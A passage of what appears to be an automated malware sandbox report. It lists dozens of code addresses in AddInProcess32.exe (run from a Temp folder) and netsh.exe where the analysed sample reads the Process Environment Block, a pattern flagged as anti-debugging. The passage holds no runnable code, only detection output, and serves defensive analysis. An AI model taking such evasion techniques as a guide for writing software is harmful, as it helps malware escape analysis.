Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01341B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013ED380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013603E2 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013E23E3 mov ecx, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013E23E3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01405BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013B53CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01374A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135A229 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01408A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01335210 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01335210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01353A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013FAA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01348A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0137927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013EB260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013FEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013C4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01339240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0134AAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013352A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0136D294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013F4AEF mov eax, dword ptr fs:[00000030h] (14 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01362AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01362ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01343D34 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0133AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013FE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013BA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01364D3B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_0135C577 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01357D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01408D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01373D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013B3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_013E3D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe | Code function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_014005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01334F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01334F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0140070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01348794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0136A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01368E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_0134766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01408ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01400EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_01378EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 10_2_013EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03723B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03723B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0371DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03724BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0372B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03722397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03701B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_0373927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_037BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_036F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 17_2_03784257 mov eax, dword ptr fs:[00000030h]
